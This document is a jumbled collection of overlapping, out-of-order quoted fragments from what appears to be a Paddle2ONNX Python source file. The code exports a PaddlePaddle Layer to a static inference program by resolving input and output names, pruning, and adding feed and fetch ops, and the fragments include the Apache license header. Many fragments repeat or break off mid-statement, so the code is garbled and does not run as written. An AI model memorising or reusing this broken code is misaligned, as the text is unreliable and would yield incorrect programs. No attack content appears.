"StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid import", "if not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars' should", "op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i)", "break with program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars", "make sure they are consistent.\" name_no_exists_error = \"The tensor `%s` does not exists.", "method.\" result_list = [] output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var,", "\"License\" # you may not use this file except in compliance with the", "else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ]", "static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif", "# avoid needless warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec)", "output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names]", "be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def", "inference model\" ) break with program_guard(main_program): uniq_target_vars = [] for i, var in", "# Unless required by applicable law or agreed to in writing, software #", "input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names:", "= output_vars_dict.values() for var in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error %", "# limitations under the License. from __future__ import absolute_import import os import numpy", "not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func,", "in jit.save, if input_spec is incomplete, declarative will throw error # inner_input_spec is", "# if input spec name not in input_var_names, only raise warning for spec", "by applicable law or agreed to in writing, software # distributed under the", "from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name", "non-tensor type spec infos. input_spec = [ spec for spec in input_spec if", "tensor `%s` does not exists. \" \\ \"Please make sure the name of", "it should be packed with same structure # as original input_spec here. if", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's", "used in declarative, which is equal to # @declarative with input_spec and jit.save", "if len(input_spec) == len(input_var_names): # no prune result_list = input_var_names # if input", "= main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in", "result_list = output_vars_dict.values() elif output_spec is not None and len(output_spec) == len(output_vars_dict): result_list", "input_spec inner_input_spec = None if input_spec is not None: for attr_func in dir(inner_layer):", "collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid", "for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for", "op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in", "permissions and # limitations under the License. from __future__ import absolute_import import os", "main_program.global_block().ops for op in all_ops: # clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName()", "if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should be 'list',", "type is %s.\" % type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if", "name_none_error = \"The %s's name is None. \" \\ \"When using jit.save, please", "TypeError( \"The input input_spec should be 'list', but received input_spec's type is %s.\"", "Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import", "# do nothing pass else: # prune for spec in input_spec: if spec.name", "in flatten(inputs) if isinstance(var, Variable) ] if input_spec is None: # no prune", "\"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\" name_no_exists_error =", "not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def", "RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" ) if not", "file except in compliance with the License. # You may obtain a copy", "of paddle2onnx should be 'Layer', but received input type is %s.\" % type(layer))", "else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions", "main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v", "input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec)", "np import inspect import six import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator", "paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict", "change user given input_spec inner_input_spec = None if input_spec is not None: for", "of InputSpec or example Tensor \" \\ \"in input_spec is the same as", "raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec,", ") if not isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx should be", "same structure # as original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec)", "import six import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction", "in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None: result_list", "License for the specific language governing permissions and # limitations under the License.", "should be a list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif", "TypeError( \"The input of paddle2onnx should be 'Layer', but received input type is", "StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there are static functions other", "and all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars' should be a list", "raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error =", "to in writing, software # distributed under the License is distributed on an", "= input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names,", "not in input_var_names: # the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error", "return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not exists.", "= var if output_spec is None: result_list = output_vars_dict.values() elif output_spec is not", "[] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name", "if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error", "implied. # See the License for the specific language governing permissions and #", "list of Variable.\") main_program = _get_valid_program(main_program) # remind user to set auc_states to", "type of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise", "in target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\") main_program = _get_valid_program(main_program)", "if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list", "in target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype,", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "with same structure # as original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec,", "for v in target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name,", "if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: #", "# the input_spec has been used in declarative, which is equal to #", "= [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var in", "PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version", "def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not exists. \" \\", "not in input_var_names, only raise warning for spec in input_spec: if spec.name is", "= OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if", "for var in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else:", "not isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx should be 'Layer', but", "to False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx", "if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names)", "import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils", "# NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions =", "equal to # @declarative with input_spec and jit.save without input_spec, # avoid needless", "that you have set the auc states to zeros before saving inference model\"", "if op.type == 'auc': warnings.warn( \"please ensure that you have set the auc", "only can be InputSpec raise ValueError(name_none_error % spec) elif spec.name not in input_var_names:", "configs.output_spec is the output tensor of \" \\ \"Layer.forward method.\" result_list = []", "or implied. # See the License for the specific language governing permissions and", "= _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment", "raise TypeError( \"The input input_spec should be 'list', but received input_spec's type is", "six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\")", "if isinstance(var, Variable) ] if input_spec is None: # no prune return input_var_names", "None: result_list = output_vars_dict.values() elif output_spec is not None and len(output_spec) == len(output_vars_dict):", "six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish", "paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def", "global_block = main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if", "only need the # var name of output, and we don't recommended to", "var in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for", "inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "result_list = [] input_var_names = [ var.name for var in flatten(inputs) if isinstance(var,", "[ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) ==", "InputSpec raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: # the input_spec", "static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if input_spec is", "you have set the auc states to zeros before saving inference model\" )", "import layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable,", "os import numpy as np import inspect import six import paddle from paddle.fluid.io", "warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [", "should be a list of Variable.\") main_program = _get_valid_program(main_program) # remind user to", "incomplete, declarative will throw error # inner_input_spec is list[InputSpec], it should be packed", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars,", "in writing, software # distributed under the License is distributed on an \"AS", "[target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)):", "isinstance(var, Variable) ] if input_spec is None: # no prune return input_var_names else:", "paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import", "Version 2.0 (the \"License\" # you may not use this file except in", "len(input_var_names): # no prune result_list = input_var_names # if input spec name not", "@dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static:", "# clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type ==", "\"in configs.output_spec is the output tensor of \" \\ \"Layer.forward method.\" result_list =", "feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these", "main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for target_v in", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "Variable.\") main_program = _get_valid_program(main_program) # remind user to set auc_states to zeros if", "var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph", "throw error # inner_input_spec is list[InputSpec], it should be packed with same structure", "received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for var in", "output tensor of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict()", "[ Get output variables ] # the rule is like [ Get input", "Get output variables ] # the rule is like [ Get input variables", "can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list", "jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\", "% type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should", "\\ \"Please make sure the name of example Tensor \" \\ \"in configs.output_spec", "sure the name of example Tensor \" \\ \"in configs.output_spec is the output", "if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to", "%s's name is None. \" \\ \"When using jit.save, please set InputSepc's name", "import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid import", "# inner_input_spec is list[InputSpec], it should be packed with same structure # as", "is None. \" \\ \"When using jit.save, please set InputSepc's name in \"", "is like [ Get input variables name ]. For output var, # we", "% spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor", "elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks if", "= declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been used", "`%s` does not exists. \" \\ \"Please make sure the name of example", "layer._layers else: inner_layer = layer # avoid change user given input_spec inner_input_spec =", "main_program = _get_valid_program(main_program) # remind user to set auc_states to zeros if the", "under the License. from __future__ import absolute_import import os import numpy as np", "in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index =", "\" \\ \"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names =", "`InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs,", "= getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward'", "you may not use this file except in compliance with the License. #", "main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type ==", "if input_spec is not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func,", "output_vars_dict.values() for var in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name)", "in input_var_names, only raise warning for spec in input_spec: if spec.name is None:", "blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise", "set auc_states to zeros if the program contains auc op all_ops = main_program.global_block().ops", "'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The", "be a list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment:", "result_list = output_vars_dict.values() for var in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error", "= main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type", "License, Version 2.0 (the \"License\" # you may not use this file except", "of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars)", "of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please", "should be None, but received the type of 'input_spec' is %s.\" % type(input_spec))", "jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\" name_no_exists_error = \"The tensor", "var.name) else: for var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error", "= output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names =", "for attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program", "of Variable.\") main_program = _get_valid_program(main_program) # remind user to set auc_states to zeros", "language governing permissions and # limitations under the License. from __future__ import absolute_import", "# the rule is like [ Get input variables name ]. For output", "'Layer', but received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer", "= True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) >", "paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is", "need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program", "use this file except in compliance with the License. # You may obtain", "# as original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward =", "user to set auc_states to zeros if the program contains auc op all_ops", "six import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from", "attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there", "isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there are static functions", "= [var.name for var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block", "pass else: # prune for spec in input_spec: if spec.name is None: #", "Variable) ] if input_spec is None: # no prune return input_var_names else: #", "input_spec only can be InputSpec raise ValueError(name_none_error % spec) elif spec.name not in", "= core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure that you", "main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars]", "to zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars = []", "if spec.name is None: # name is None, the input_spec only can be", "input_spec = [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if", "warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: # prune for spec", "input_spec is not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None)", "Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0", "= concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment:", "]. For output var, # we only support VarBase spec, and actually, we", "raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: # the input_spec can", "None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction)", "in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec(", "layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter,", "\"The tensor `%s` does not exists. \" \\ \"Please make sure the name", "InputSpec or example Tensor \" \\ \"in input_spec is the same as the", "should be 'Layer', but received input type is %s.\" % type(layer)) if isinstance(layer,", "%s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer", "make sure the name of InputSpec or example Tensor \" \\ \"in input_spec", "here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program", "functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec)", "is the same as the name of InputSpec in \" \\ \"`to_static` decorated", "input_spec, # avoid needless warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs,", "!= attr_func: raise ValueError( \"If there are static functions other than 'forward' that", "input variables name ]. For output var, # we only support VarBase spec,", "[] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type", "in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program,", "\"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer,", "for var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name)", "output_spec is None: result_list = output_vars_dict.values() elif output_spec is not None and len(output_spec)", "else: inner_layer = layer # avoid change user given input_spec inner_input_spec = None", "output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone()", "_get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment =", "Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for", "target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable)", "'forward' != attr_func: raise ValueError( \"If there are static functions other than 'forward'", "(list, tuple)): raise TypeError( \"The input input_spec should be 'list', but received input_spec's", "of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError(", "for var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block()", "input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been used in declarative, which", "infos. input_spec = [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ]", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "%s.\" % type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec):", "use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program", "no prune result_list = input_var_names # if input spec name not in input_var_names,", "we only support VarBase spec, and actually, we only need the # var", "import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers", "result_list = input_var_names # if input spec name not in input_var_names, only raise", "paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as", "raise TypeError( \"The input of paddle2onnx should be 'Layer', but received input type", "paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work", "== 'auc': warnings.warn( \"please ensure that you have set the auc states to", "user given input_spec inner_input_spec = None if input_spec is not None: for attr_func", "None, but received the type of 'input_spec' is %s.\" % type(input_spec)) if not", "the same as the name of InputSpec in \" \\ \"`to_static` decorated on", "len(input_spec) == len(input_var_names): # no prune result_list = input_var_names # if input spec", "isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should be 'list', but received", "# # Unless required by applicable law or agreed to in writing, software", "spec infos. input_spec = [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec)", "numpy as np import inspect import six import paddle from paddle.fluid.io import _get_valid_program", "under the Apache License, Version 2.0 (the \"License\" # you may not use", "they are consistent.\" name_no_exists_error = \"The tensor `%s` does not exists. \" \\", "input_var_names else: # fileter out non-tensor type spec infos. input_spec = [ spec", "attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program =", "[feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks", "express or implied. # See the License for the specific language governing permissions", "== len(input_var_names): # no prune result_list = input_var_names # if input spec name", "== \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush()", "tensor of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for", "OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec", "for var in target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\") main_program", "don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars", "paddle.fluid import core from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework", "type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid", "= None if input_spec is not None: for attr_func in dir(inner_layer): static_func =", "these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in", "\\ \"When using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and", "inner_input_spec is list[InputSpec], it should be packed with same structure # as original", "either express or implied. # See the License for the specific language governing", "= layer._layers else: inner_layer = layer # avoid change user given input_spec inner_input_spec", "import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The", "be a list of Variable.\") main_program = _get_valid_program(main_program) # remind user to set", "limitations under the License. from __future__ import absolute_import import os import numpy as", "False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx should", "Tensor \" \\ \"in input_spec is the same as the name of InputSpec", "on the Layer.forward method.\" result_list = [] input_var_names = [ var.name for var", "name not in input_var_names, only raise warning for spec in input_spec: if spec.name", "rule is like [ Get input variables name ]. For output var, #", "\" \\ \"in input_spec is the same as the name of InputSpec in", "Variable): output_vars_dict[var.name] = var if output_spec is None: result_list = output_vars_dict.values() elif output_spec", "# no prune return input_var_names else: # fileter out non-tensor type spec infos.", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "== attr_func: # transform in jit.save, if input_spec is incomplete, declarative will throw", "_get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the rule is", "Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure", "attr_func: # transform in jit.save, if input_spec is incomplete, declarative will throw error", "name is None. \" \\ \"When using jit.save, please set InputSepc's name in", "all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list", "is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input", "@declarative with input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec =", "pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative", "the specific language governing permissions and # limitations under the License. from __future__", "else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator =", "is None: result_list = output_vars_dict.values() elif output_spec is not None and len(output_spec) ==", "spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else:", "not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name", "elif spec.name not in input_var_names: # the input_spec can be `InputSpec` or `VarBase`", "# transform in jit.save, if input_spec is incomplete, declarative will throw error #", "'input_spec' should be None, but received the type of 'input_spec' is %s.\" %", "import core from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import", "be InputSpec raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: # the", "output variables ] # the rule is like [ Get input variables name", "raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable): target_vars =", "(bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars' should be a", "or example Tensor \" \\ \"in input_spec is the same as the name", "be 'list', but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = []", "[] output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] =", "in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name not", "if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform", "# remind user to set auc_states to zeros if the program contains auc", "the License. # You may obtain a copy of the License at #", "of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for var", "% spec) elif spec.name not in input_var_names: # the input_spec can be `InputSpec`", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info", "result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator()", "can be 